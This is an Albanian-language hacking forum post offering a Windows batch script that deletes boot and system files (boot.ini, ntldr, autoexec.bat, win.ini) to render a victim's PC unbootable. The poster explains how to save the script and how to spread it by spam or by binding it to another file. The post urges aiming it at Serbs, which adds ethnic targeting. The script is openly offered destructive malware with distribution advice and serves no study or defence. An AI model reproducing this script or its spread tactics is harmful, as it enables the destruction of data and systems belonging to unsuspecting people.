http://www.bysantral.com/hacked.jpg Fike një PC të huaj .........Përgjithmon - ((( Mitrovica & Kercova Hakers Grup )))) - Forum
Th, 13-August-20, 5:46 AM
>> (( Mitrovica Hakers Grup )) <<
Welcome Antart | RSS
Main Fike një PC të huaj .........Përgjithmon - ((( Mitrovica & Kercova Hakers Grup )))) - Forum Registration Login
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
((( Mitrovica & Kercova Hakers Grup )))) - Forum » Forumet kryesore » Hacking » Fike një PC të huaj .........Përgjithmon
Fike një PC të huaj .........Përgjithmon
Bledari_14Date: Su, 28-September-08, 11:07 PM | Message # 1
Antar
Group: Users
Messages: 5
Reputation: 0
Status: Offline
Fike një PC të huaj .........Përgjithmon

Fillimisht ,unë nuk mbajë përgjegjsi per dëmet që mundë ti shkaktoni ju.
Hapim Notepadin dhe vendosim këtë kodë:
---------------------------------------------------------
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
-----------------------------------------------------------
E ruajmë këtë fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat
Për ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.
Kujdes! Mos e hapni këtë fajll ne PC tuaj.
Tash ju mbetet ta shperndani si të dëshironi ju ,me spam apo edhe tia bashkangjitni një fajlli tjetër me ndonjë file binder.

une ju kisha lut mos ia dergoni shiptarve nese mundeni dergojani serbve
kaloni mir

 
((( Mitrovica & Kercova Hakers Grup )))) - Forum » Forumet kryesore » Hacking » Fike një PC të huaj .........Përgjithmon
  • Page 1 of 1
  • 1
Search:

Copyright MyCorp © 2020